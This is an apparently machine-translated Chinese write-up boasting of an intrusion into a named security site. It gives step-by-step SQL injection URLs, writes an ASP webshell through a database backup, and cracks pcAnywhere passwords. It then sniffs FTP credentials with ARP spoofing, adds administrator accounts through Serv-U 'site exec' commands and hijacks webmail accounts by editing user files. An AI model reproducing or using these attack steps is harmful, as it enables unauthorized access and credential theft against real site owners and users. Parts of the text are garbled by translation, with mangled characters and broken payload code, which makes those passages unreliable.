Foreword: I don't want to figure you, but you have some excessive, take someone's manuscript to sell money, take someone's technology to install yourself, this doesn't matter. Your superiority makes me have to remind you, your superiority is based on others.
First, scanned, found FTP. . . . . No common vulnerability. . . . . Determine ARP spoof and smell.
Second, find a sniffing host:
C: /> ping Hacker.com.cn
Pinging Hacker.com.cn [211.157.102.239] with 32 bytes of data:
Start scan 211.157.102.1-211.157.102.255 80 1433 port, find a station of a default directory, then find the injection vulnerability.
http://xx.xx.xx.xx/111.asp? id = 3400 and 1 = (select is_srvrolemember ('sysadmin'))
Found not SA permission:
http://xx.xx.xx.xx/111.asp? id = 3400 and 1 = (select name from master.dbo.sdatabases where dbid = 7)
Get the library name KU1:
Come, I want to do a shell (here, the brothers of the night brothers and smells provide information), do not understand, look at the online information:
http: //xx.xx.xx.xx/111.asp? id = 3400; Create Table [DBO]. [xiaolu] ([xiaoxue] [char] (255));
http: //xx.xx.xx.xx/111.asp id = 3400; DECLARE @result varchar (255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots? ',' / ', @Result Output Insert Into Xiaolu (xiaoxue) Values (@RESULT);
http://xx.xx.xx.xx/111.asp? id = 3400 and (select top 1 xiaoxue from xiaolu) = 1
Get the web path D: / xxxx, next:
http://xx.xx.xx.xx/111.asp? id = 3400; use ku1; -
http: //xx.xx.xx.xx/111.asp? id = 3400; CREATE TABLE CMD (STR Image);
http://xx.xx.xx.xx/111.asp? id = 3400; INSERT INTO CMD (STR) VALUES ('<% if Request ("a") <> "" "" "" "") %> ');
http://xx.xx.xx.xx/111.asp? id = 3400; Backup Database Ku1 to disk = 'd: /xxxx/l.asp'; -
(For this use of this shell, see the animation of the smallest ASP back door
http://666w.cn/down/view.asp?id=754)
Upload ............ Shell, prepare to improve permissions ... found pcanywhere, found:
C: / documents and settings / all users / application data / symantec / pcanywhere / pca.xxx.cif stream crack password, pcanywhere connection, it seems that God is more helpful, everything goes well, admin password and PCANYWHERE password, :), tracert a bit:
1 <10 ms <10 ms <10 ms 211.157.102.239
诜 诜 写 伲 伲 伲 (About ARP deception, see an article I wrote in 2003-2003-3
http://bbs.666w.cn/dispbbs.asp?boardid=7&id=764&page=1)
Upload the software we need with WebShell:
Winpcap.exe arpsniffer.exe pv.exe
Arpsniffer.exe ------------ 57 KGo's exchange environment Sniffing tool
Pv.exe ---------------- 60K (a command line program included with PrcView, Huajun has a lower) killing process
Winpcap.exe ------------------ 678K sniffing uses a driver
Install WinpCap.exe, the next step, the next step, complete.
Build a hidden virtual directory (how to build yourself to check the data), the application protection is set to so so that we run the ARP program with Webshell, otherwise it is not good to be found by the administrator.
Third, start sniffing:
OK, continue ........ Start Sniffer ........ Due to the current Chinese network structure and related technicians quality. This can be said to be a hundred hundred, run:
Arpsniffer.exe 211.157.102.254 211.157.102.239 21 C: 1.txt 1
211.157.102.254 is a gateway, 211.157.102.239 is a black anti-IP, C: 1.TXT is a log file, 1 is a network card ID
What should I do next? Of course, I have waited ... But we don't want to wait a few days. We hope to be able to be successful. Tell the night brother to take action, (嘿嘿), singleer in QQ (black defense) Very edited),
Black night:
"Black defense is black. I heard that someone went up ....... Quickly take a look ..."
Loners:
Ok, I will see it.
This is omitted here. . . . .
Haha ......... The result is not to say. After a few minutes, we saw that the log file was significantly increased, because the Arpsniffer process was running directly, so I used WebShell:
PV -K -F Arpsniffer.exe
Kill this process, see password ~~~~~~
Fourth, work:
Hey, this is this FTP,
Http://978229.hacker.com.cn/, upload the shell, yeah! No safety disk can be browsed, yeah, yeah, a little duck, it turns out that you are in E: / wwwroot, haha.
Enhance the full limit, SERV-U improved permissions, how can I run the program, yeah, the original cmd.exe changed to King.exe, net.exe changed to Net1King.exe, continue fpipe -v -l 3041 - R 43958 127.0.0.1
Add FTP users, set as an administrator, login
Quote Site Exec Net1King Xiaolu Xiaoxue / Add
Quote Site Exec Net1King Localgroup Administrators xiaolu / add3389 login, yeah, no, continue
Quote Site EXEC Net1King Xiaolu Xiaoxue @@! #! @ # @ !! @ # @ 123 / add
Quote Site Exec Net1King Localgroup Administrators xiaolu / add
Haha, I also made a password limit, go in. I will not say it next, let the black anti-anti-herme harm. . . . . . . . (Omit N more content here)
Look at what is good, I find a Webeasymail server. Look, see what you have to edit, I don't know how the password is.
Hey, come with me: D: / mail / mail /, there are userweb.ini in each user directory.
Open, modify
QuestionInfo = 1
Answerinfo = 1
Hintinfo = 1
turn on
http://hacker.com.cn/mail--- Forgot your password, add our questions and answers, dig up, so much letters, have there be no good things?
This retreat, the rest is left to the editors.
Five: Summary:
This invasion has been around for about 1 hour. There is no high-profile technology. It is a more shallow technology. The sniffing penetration is a few years ago. SQL injection is a popular method, nor is it new, can be so Get the FTP password thanks to the use of the "Social Engineering".
Although technology is very valuable, flexible use will make technology more valuable.